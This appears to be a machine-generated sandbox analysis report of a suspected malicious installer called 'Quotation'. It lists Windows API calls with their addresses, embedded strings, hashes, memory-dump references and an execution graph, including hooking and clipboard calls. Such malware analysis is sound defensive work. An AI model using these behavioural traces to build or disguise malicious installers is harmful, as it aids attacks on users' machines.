                                                                • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00406DA4
                                                                • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00406DBC
                                                                Strings
                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D22
                                                                • *?|<>/":, xrefs: 00406D7F
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D1B, 00406D1D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$Prev
                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                • API String ID: 589700163-879122614
                                                                • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                • Instruction ID: 64caea1e5fba35c947d9094266ac5fc002638ab42ea644ca00d5fa91912821bd
                                                                • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                • Instruction Fuzzy Hash: 7511D511B0063156DB30672A8C4097772E8DF69761756443BFDC6E32C0F77D8D9192B9
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                • String ID:
                                                                • API String ID: 2320649405-0
                                                                • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                • Instruction ID: 26ea8d1a65f0c358df8059d13c2b59527feb86654ff2728a298fdc5f00fd0ae6
                                                                • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                • Instruction Fuzzy Hash: E221D675500B049FDB649F28DA4895BB7F4EF45711B108A3EE896A26A0DB38E814DF28
                                                                APIs
                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040364B
                                                                • MulDiv.KERNEL32(00127198,00000064,00127198), ref: 00403673
                                                                • wsprintfW.USER32 ref: 00403683
                                                                • SetWindowTextW.USER32(?,?), ref: 00403693
                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A5
                                                                Strings
                                                                • verifying installer: %d%%, xrefs: 0040367D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                • String ID: verifying installer: %d%%
                                                                • API String ID: 1451636040-82062127
                                                                • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                • Instruction ID: 44471e5cb11ab05bb0c6ce4c76b363bdac3f6882ce80e8a3b6daee8e8afc751d
                                                                • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                • Instruction Fuzzy Hash: BE018F71540208BBDF20AF60DE45BAA3B28A700305F00803AF642B51E0DBB58554CF4C
                                                                APIs
                                                                  • Part of subcall function 733F12F8: GlobalAlloc.KERNEL32(00000040,?,733F11C4,-000000A0), ref: 733F1302
                                                                • GlobalFree.KERNEL32(00000000), ref: 733F22F1
                                                                • GlobalFree.KERNEL32(00000000), ref: 733F2326
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2288029483.00000000733F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 733F0000, based on PE: true
                                                                • Associated: 00000000.00000002.2287862220.00000000733F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288085712.00000000733F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288109582.00000000733F6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_733f0000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc
                                                                • String ID:
                                                                • API String ID: 1780285237-0
                                                                • Opcode ID: 5e5f640aa358c5ea33ee208d539251b6610b5d18c8f4d50adcb168e718b2d158
                                                                • Instruction ID: 6742f0a5d3de6da1774a9d67bcbb80c4d2557b0bc468bf3fad40db8d7459f4cb
                                                                • Opcode Fuzzy Hash: 5e5f640aa358c5ea33ee208d539251b6610b5d18c8f4d50adcb168e718b2d158
                                                                • Instruction Fuzzy Hash: B231E07660420BEBE7369F65DC44F2ABBBDFB45311BD0052EF40AC6190D729D880DB61
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 733F116B
                                                                • GlobalFree.KERNEL32(00000000), ref: 733F11AE
                                                                • GlobalFree.KERNEL32(00000000), ref: 733F11CD
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 733F11E6
                                                                • GlobalFree.KERNEL32 ref: 733F125C
                                                                • GlobalFree.KERNEL32(?), ref: 733F12A7
                                                                • GlobalFree.KERNEL32(00000000), ref: 733F12BF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2288029483.00000000733F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 733F0000, based on PE: true
                                                                • Associated: 00000000.00000002.2287862220.00000000733F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288085712.00000000733F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288109582.00000000733F6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_733f0000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc
                                                                • String ID:
                                                                • API String ID: 1780285237-0
                                                                • Opcode ID: 2ca605ed4a08cfb208b41ecce2bb92307e17e6b483de8c1ca67417c26087976a
                                                                • Instruction ID: 69eacc07ae163cd5192051e01c62301106cd0592147949452933a927d1b6d21b
                                                                • Opcode Fuzzy Hash: 2ca605ed4a08cfb208b41ecce2bb92307e17e6b483de8c1ca67417c26087976a
                                                                • Instruction Fuzzy Hash: E15175B6900303AFE730EFA9E850B26B7BCFF58214B94452AF54AD7250D735DA01CB55
                                                                APIs
                                                                • GlobalFree.KERNEL32(00000000), ref: 733F21BF
                                                                  • Part of subcall function 733F12E1: lstrcpynW.KERNEL32(00000000,?,733F156A,?,733F11C4,-000000A0), ref: 733F12F1
                                                                • GlobalAlloc.KERNEL32(00000040), ref: 733F212C
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 733F214C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2288029483.00000000733F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 733F0000, based on PE: true
                                                                • Associated: 00000000.00000002.2287862220.00000000733F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288085712.00000000733F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288109582.00000000733F6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_733f0000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                • String ID:
                                                                • API String ID: 4216380887-0
                                                                • Opcode ID: 9b10fbeb0abd41ab3d2ae5323a979aa645274999ee2da092215316ff46338ed1
                                                                • Instruction ID: a6f2455600f756bc0fc408f8b0e24950eea006fa8b54711ce5c5f5672080d312
                                                                • Opcode Fuzzy Hash: 9b10fbeb0abd41ab3d2ae5323a979aa645274999ee2da092215316ff46338ed1
                                                                • Instruction Fuzzy Hash: FE41C17680520BEFD331AF65D844FEAB7BCFB04340BC4023EE949DA149D7789581CAA4
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,733F2B4C,00000000,00000808), ref: 733F1F8C
                                                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 733F1F97
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 733F1FAB
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 733F1FB6
                                                                • GlobalFree.KERNEL32(00000000), ref: 733F1FBF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2288029483.00000000733F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 733F0000, based on PE: true
                                                                • Associated: 00000000.00000002.2287862220.00000000733F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288085712.00000000733F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288109582.00000000733F6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_733f0000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                • String ID:
                                                                • API String ID: 1148316912-0
                                                                • Opcode ID: cc8438bcc6e77ba786fc5784ec70a08dcc8798bc4e3f2c0f139d8ea025d1916d
                                                                • Instruction ID: f8fc52535a8afd8c27f6e27cabc3a2eb9136367e43e922c55b494ebd1f951cd2
                                                                • Opcode Fuzzy Hash: cc8438bcc6e77ba786fc5784ec70a08dcc8798bc4e3f2c0f139d8ea025d1916d
                                                                • Instruction Fuzzy Hash: 71F0C03310812ABBD6202AEBDC0CE57FE6CEB8B6FAB660215F61DD11A0D56668008771
                                                                APIs
                                                                • wsprintfW.USER32 ref: 733F1F51
                                                                • lstrcpyW.KERNEL32(?,error,00001018,733F1765,00000000,?), ref: 733F1F71
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2288029483.00000000733F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 733F0000, based on PE: true
                                                                • Associated: 00000000.00000002.2287862220.00000000733F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288085712.00000000733F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288109582.00000000733F6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_733f0000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: lstrcpywsprintf
                                                                • String ID: callback%d$error
                                                                • API String ID: 2408954437-1307476583
                                                                • Opcode ID: 0646476da167c090ed8d6c8f4dbfc176f2c8878f9e28e232f3dccde1f9c54f0b
                                                                • Instruction ID: ec26dc506b5f82ff81a4ef079f1c0e0d9c308e5dbac8aff8a956f8c9cfe3c566
                                                                • Opcode Fuzzy Hash: 0646476da167c090ed8d6c8f4dbfc176f2c8878f9e28e232f3dccde1f9c54f0b
                                                                • Instruction Fuzzy Hash: 5AF0A735604123AFE3248B04E948FB6B3B9EF85314F89829CFD4A87356C778EC408B51
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CA1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 0040653A
                                                                • CharPrevW.USER32(?,00000000), ref: 00406545
                                                                • lstrcatW.KERNEL32(?,004082B0), ref: 00406557
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406534
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: CharPrevlstrcatlstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 2659869361-823278215
                                                                • Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                • Instruction ID: 997ea4b4438496dccce44eacbb2634370b3c3ae0899ac86cf6792f2d8b8f87b4
                                                                • Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                • Instruction Fuzzy Hash: F7D05E31102924AFC2026B58AE08D9B77ACEF46341341406EFAC1B3160CB745D5287ED
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2288029483.00000000733F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 733F0000, based on PE: true
                                                                • Associated: 00000000.00000002.2287862220.00000000733F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288085712.00000000733F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288109582.00000000733F6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_733f0000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: FreeGlobal$__alldvrm
                                                                • String ID:
                                                                • API String ID: 482422042-0
                                                                • Opcode ID: b9378554009063d70fa4965fa7413c4df7b072829575e79e051fda82e11cb770
                                                                • Instruction ID: 3fb589337de69ee521200348c775a4056f16398b4e2c7082a69d4d5cbfa52b40
                                                                • Opcode Fuzzy Hash: b9378554009063d70fa4965fa7413c4df7b072829575e79e051fda82e11cb770
                                                                • Instruction Fuzzy Hash: 6C51E672E043474BD3369E75AD8077AB6FEAFD8214BD84A2EF047C3294E7A1C9818351
                                                                APIs
                                                                • DestroyWindow.USER32(00000000), ref: 00403378
                                                                • GetTickCount.KERNEL32 ref: 00403397
                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040362D,00000000), ref: 004033B6
                                                                • ShowWindow.USER32(00000000,00000005), ref: 004033C4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                • String ID:
                                                                • API String ID: 2102729457-0
                                                                • Opcode ID: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                • Instruction ID: 5fb2c38a213eff1d2f515c73fe307429b33afba48c29838db2cc379488067e45
                                                                • Opcode Fuzzy Hash: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                • Instruction Fuzzy Hash: C9F0F870551700EBDB209F60EF8EB163AA8B740B02F505579F941B51F0DB788514CA5C
                                                                APIs
                                                                • OleInitialize.OLE32(00000000), ref: 00405852
                                                                  • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 0040589E
                                                                  • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                Strings
                                                                • Litteraturhistoriens Setup: Installing, xrefs: 00405842
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$InitializeUninitialize
                                                                • String ID: Litteraturhistoriens Setup: Installing
                                                                • API String ID: 1011633862-3759432448
                                                                • Opcode ID: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
                                                                • Instruction ID: 8d413f420cbd2cda170a8e13f5886ccfc68e5e1a5fc2061566676394b2cd1e54
                                                                • Opcode Fuzzy Hash: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
                                                                • Instruction Fuzzy Hash: 97F09077800A008EE3416B54AD01B6777A4EBD1305F09C53EEE88A62A1DB794C628A5E

                                                                Execution Graph

                                                                Execution Coverage:10%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:97
                                                                Total number of Limit Nodes:9
                                                                execution_graph 42374 37237260 42375 37237268 42374->42375 42377 3723728b 42375->42377 42378 37235d14 42375->42378 42379 372372a0 KiUserCallbackDispatcher 42378->42379 42381 3723730e 42379->42381 42381->42375 42470 372397f0 42472 37239834 SetWindowsHookExA 42470->42472 42473 3723987a 42472->42473 42474 37237cb0 42475 37237d0a OleGetClipboard 42474->42475 42476 37237d4a 42475->42476 42477 372360d0 DuplicateHandle 42478 37236166 42477->42478 42382 37235e88 42383 37235e89 GetCurrentProcess 42382->42383 42385 37235f20 GetCurrentThread 42383->42385 42387 37235f19 42383->42387 42386 37235f5d GetCurrentProcess 42385->42386 42388 37235f56 42385->42388 42391 37235f93 42386->42391 42387->42385 42388->42386 42389 37235fbb GetCurrentThreadId 42390 37235fec 42389->42390 42391->42389 42479 37237b18 42480 37237b23 42479->42480 42481 37237b33 42480->42481 42483 37235e6c 42480->42483 42484 37237b68 OleInitialize 42483->42484 42485 37237bcc 42484->42485 42485->42481 42486 37232378 42487 372323e0 CreateWindowExW 42486->42487 42489 3723249c 42487->42489 42392 ad044 42393 ad05c 42392->42393 42394 ad0b6 42393->42394 42399 37232522 42393->42399 42403 3723065c 42393->42403 42413 37232530 42393->42413 42417 37236cb2 42393->42417 42400 37232531 42399->42400 42401 3723065c 2 API calls 42400->42401 42402 37232577 42401->42402 42402->42394 42404 37230667 42403->42404 42405 37236d41 42404->42405 42407 37236d31 42404->42407 42408 37236d3f 42405->42408 42446 37235cbc 42405->42446 42428 37391288 42407->42428 42433 37236e58 42407->42433 42437 37236e68 42407->42437 42441 3739127a 42407->42441 42414 37232556 42413->42414 42415 3723065c 2 API calls 42414->42415 42416 37232577 42415->42416 42416->42394 42418 37236cba 42417->42418 42419 37236cca 42417->42419 42418->42394 42420 37236d41 42419->42420 42422 37236d31 42419->42422 42421 37235cbc 2 API calls 42420->42421 42423 37236d3f 42420->42423 42421->42423 42424 37391288 2 API calls 42422->42424 42425 3739127a 2 API calls 42422->42425 42426 37236e68 2 API calls 42422->42426 42427 37236e58 2 API calls 42422->42427 42424->42423 42425->42423 42426->42423 42427->42423 42430 3739129c 42428->42430 42429 37391328 42429->42408 42453 37391340 42430->42453 42456 3739132f 42430->42456 42435 37236e68 42433->42435 42434 37235cbc 2 API calls 42434->42435 42435->42434 42436 37236f4e 42435->42436 42436->42408 42438 37236e76 42437->42438 42439 37235cbc 2 API calls 42438->42439 42440 37236f4e 42438->42440 42439->42438 42440->42408 42443 37391288 42441->42443 42442 37391328 42442->42408 42444 3739132f 2 API calls 42443->42444 42445 37391340 2 API calls 42443->42445 42444->42442 42445->42442 42447 37235cc7 42446->42447 42448 37237054 42447->42448 42449 37236faa 42447->42449 42451 3723065c CallWindowProcW 42448->42451 42450 37237002 CallWindowProcW 42449->42450 42452 37236fb1 42449->42452 42450->42452 42451->42452 42452->42408 42454 37391351 42453->42454 42460 373924f8 42453->42460 42454->42429 42457 37391340 42456->42457 42458 37391351 42457->42458 42459 373924f8 2 API calls 42457->42459 42458->42429 42459->42458 42463 37235cbc 2 API calls 42460->42463 42464 37236f59 42460->42464 42461 3739251a 42461->42454 42463->42461 42465 37237054 42464->42465 42466 37236faa 42464->42466 42468 3723065c CallWindowProcW 42465->42468 